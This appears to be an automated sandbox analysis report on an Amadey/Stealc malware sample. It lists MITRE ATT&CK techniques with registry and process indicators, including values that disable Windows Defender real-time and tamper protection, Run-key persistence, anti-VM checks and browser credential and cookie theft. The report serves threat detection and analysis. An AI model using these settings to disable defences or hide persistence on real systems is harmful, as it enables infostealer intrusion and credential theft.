amadey | eac6415514e57d0fd71154226cf6d5934a93424d8a93e8d0f407d5b2e4533f70

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	d99938247d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	d99938247d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	d99938247d.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	d99938247d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	d99938247d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	d99938247d.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 4080 created 2968	4080	rhnew.exe	50

Enumerates VirtualBox registry keys 2 TTPs 1 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF	790db7793c.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 16 IoCs

Query Registry

Virtualization/Sandbox Evasion

credential_access stealer

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3a27476f99.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rhnew.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	dee7fa7ddf.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	663bb1178a.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	790db7793c.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	d99938247d.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	AEGHCFIDAK.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	663bb1178a.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	01c06f74eb.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	6293d779b0.exe

Blocklisted process makes network request 3 IoCs

flow	pid	Process
145	4056	powershell.exe
205	4056	powershell.exe
226	4056	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4020	powershell.exe
5640	powershell.exe
4056	powershell.exe
3660	powershell.exe
1896	powershell.exe
2688	powershell.exe
5680	powershell.exe
6140	powershell.exe
2236	powershell.exe
5632	powershell.exe
1712	powershell.exe
5748	powershell.exe

Downloads MZ/PE file

Uses browser remote debugging 2 TTPs 9 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
4704	chrome.exe
5464	msedge.exe
5684	msedge.exe
1896	msedge.exe
1268	chrome.exe
2040	chrome.exe
612	msedge.exe
3800	chrome.exe
4784	msedge.exe

Checks BIOS information in registry 2 TTPs 32 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6293d779b0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rhnew.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	790db7793c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	d99938247d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	663bb1178a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	01c06f74eb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	dee7fa7ddf.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	dee7fa7ddf.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	663bb1178a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3a27476f99.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	663bb1178a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	790db7793c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	AEGHCFIDAK.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	AEGHCFIDAK.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rhnew.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	663bb1178a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	01c06f74eb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6293d779b0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	d99938247d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3a27476f99.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	skotes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	dee7fa7ddf.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	axplong.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	663bb1178a.exe

Executes dropped EXE 16 IoCs

pid	Process
4912	skotes.exe
3320	skotes.exe
4080	rhnew.exe
4716	dee7fa7ddf.exe
792	axplong.exe
1660	663bb1178a.exe
1180	3a27476f99.exe
1476	663bb1178a.exe
2204	axplong.exe
4888	skotes.exe
5452	790db7793c.exe
5228	01c06f74eb.exe
4116	6293d779b0.exe
2980	94bcd22a0e.exe
1868	d99938247d.exe
5100	AEGHCFIDAK.exe

Identifies Wine through registry keys 2 TTPs 16 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine	01c06f74eb.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine	663bb1178a.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine	790db7793c.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine	5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine	dee7fa7ddf.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine	d99938247d.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine	663bb1178a.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine	6293d779b0.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine	AEGHCFIDAK.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine	rhnew.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine	3a27476f99.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine	skotes.exe

Loads dropped DLL 2 IoCs

pid	Process
1660	663bb1178a.exe
1660	663bb1178a.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	d99938247d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	d99938247d.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3a27476f99.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1005115001\\3a27476f99.exe"	axplong.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\01c06f74eb.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011477001\\01c06f74eb.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6293d779b0.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011478001\\6293d779b0.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\94bcd22a0e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011479001\\94bcd22a0e.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d99938247d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011480001\\d99938247d.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\663bb1178a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1005114001\\663bb1178a.exe"	axplong.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000400000002296a-539.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs

pid	Process
3556	5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe
4912	skotes.exe
3320	skotes.exe
4080	rhnew.exe
4716	dee7fa7ddf.exe
792	axplong.exe
1660	663bb1178a.exe
1180	3a27476f99.exe
1476	663bb1178a.exe
2204	axplong.exe
4888	skotes.exe
5452	790db7793c.exe
5228	01c06f74eb.exe
4116	6293d779b0.exe
1868	d99938247d.exe
5100	AEGHCFIDAK.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe
File created	C:\Windows\Tasks\axplong.job	dee7fa7ddf.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
3876	4080	WerFault.exe	111
5908	1180	WerFault.exe	130
1116	5228	WerFault.exe	158
316	1140	WerFault.exe	224

System Location Discovery: System Language Discovery 1 TTPs 53 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d99938247d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	94bcd22a0e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3a27476f99.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	axplong.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	663bb1178a.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	94bcd22a0e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6293d779b0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dee7fa7ddf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	94bcd22a0e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	790db7793c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AEGHCFIDAK.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rhnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	01c06f74eb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	663bb1178a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Checks processor information in registry 2 TTPs 13 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	663bb1178a.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	663bb1178a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe

Enumerates system info in registry 2 TTPs 8 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 5 IoCs

pid	Process
5268	taskkill.exe
2024	taskkill.exe
2876	taskkill.exe
4292	taskkill.exe
5100	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133776632456316520"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	firefox.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3556	5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe
3556	5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe
4912	skotes.exe
4912	skotes.exe
3320	skotes.exe
3320	skotes.exe
5004	powershell.exe
5004	powershell.exe
4056	powershell.exe
4056	powershell.exe
2236	powershell.exe
2236	powershell.exe
4080	rhnew.exe
4080	rhnew.exe
4080	rhnew.exe
4080	rhnew.exe
4080	rhnew.exe
4080	rhnew.exe
3056	svchost.exe
3056	svchost.exe
3056	svchost.exe
3056	svchost.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
2612	powershell.exe
2612	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
4716	dee7fa7ddf.exe
4716	dee7fa7ddf.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
792	axplong.exe
792	axplong.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
3660	powershell.exe
3660	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
1660	663bb1178a.exe
1660	663bb1178a.exe
5004	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
4784	msedge.exe
4784	msedge.exe
4784	msedge.exe
4784	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5004	powershell.exe
Token: SeDebugPrivilege	4056	powershell.exe
Token: SeDebugPrivilege	2236	powershell.exe
Token: SeDebugPrivilege	2612	powershell.exe
Token: SeIncreaseQuotaPrivilege	2612	powershell.exe
Token: SeSecurityPrivilege	2612	powershell.exe
Token: SeTakeOwnershipPrivilege	2612	powershell.exe
Token: SeLoadDriverPrivilege	2612	powershell.exe
Token: SeSystemProfilePrivilege	2612	powershell.exe
Token: SeSystemtimePrivilege	2612	powershell.exe
Token: SeProfSingleProcessPrivilege	2612	powershell.exe
Token: SeIncBasePriorityPrivilege	2612	powershell.exe
Token: SeCreatePagefilePrivilege	2612	powershell.exe
Token: SeBackupPrivilege	2612	powershell.exe
Token: SeRestorePrivilege	2612	powershell.exe
Token: SeShutdownPrivilege	2612	powershell.exe
Token: SeDebugPrivilege	2612	powershell.exe
Token: SeSystemEnvironmentPrivilege	2612	powershell.exe
Token: SeRemoteShutdownPrivilege	2612	powershell.exe
Token: SeUndockPrivilege	2612	powershell.exe
Token: SeManageVolumePrivilege	2612	powershell.exe
Token: 33	2612	powershell.exe
Token: 34	2612	powershell.exe
Token: 35	2612	powershell.exe
Token: 36	2612	powershell.exe
Token: SeDebugPrivilege	3660	powershell.exe
Token: SeIncreaseQuotaPrivilege	3660	powershell.exe
Token: SeSecurityPrivilege	3660	powershell.exe
Token: SeTakeOwnershipPrivilege	3660	powershell.exe
Token: SeLoadDriverPrivilege	3660	powershell.exe
Token: SeSystemProfilePrivilege	3660	powershell.exe
Token: SeSystemtimePrivilege	3660	powershell.exe
Token: SeProfSingleProcessPrivilege	3660	powershell.exe
Token: SeIncBasePriorityPrivilege	3660	powershell.exe
Token: SeCreatePagefilePrivilege	3660	powershell.exe
Token: SeBackupPrivilege	3660	powershell.exe
Token: SeRestorePrivilege	3660	powershell.exe
Token: SeShutdownPrivilege	3660	powershell.exe
Token: SeDebugPrivilege	3660	powershell.exe
Token: SeSystemEnvironmentPrivilege	3660	powershell.exe
Token: SeRemoteShutdownPrivilege	3660	powershell.exe
Token: SeUndockPrivilege	3660	powershell.exe
Token: SeManageVolumePrivilege	3660	powershell.exe
Token: 33	3660	powershell.exe
Token: 34	3660	powershell.exe
Token: 35	3660	powershell.exe
Token: 36	3660	powershell.exe
Token: SeIncreaseQuotaPrivilege	3660	powershell.exe
Token: SeSecurityPrivilege	3660	powershell.exe
Token: SeTakeOwnershipPrivilege	3660	powershell.exe
Token: SeLoadDriverPrivilege	3660	powershell.exe
Token: SeSystemProfilePrivilege	3660	powershell.exe
Token: SeSystemtimePrivilege	3660	powershell.exe
Token: SeProfSingleProcessPrivilege	3660	powershell.exe
Token: SeIncBasePriorityPrivilege	3660	powershell.exe
Token: SeCreatePagefilePrivilege	3660	powershell.exe
Token: SeBackupPrivilege	3660	powershell.exe
Token: SeRestorePrivilege	3660	powershell.exe
Token: SeShutdownPrivilege	3660	powershell.exe
Token: SeDebugPrivilege	3660	powershell.exe
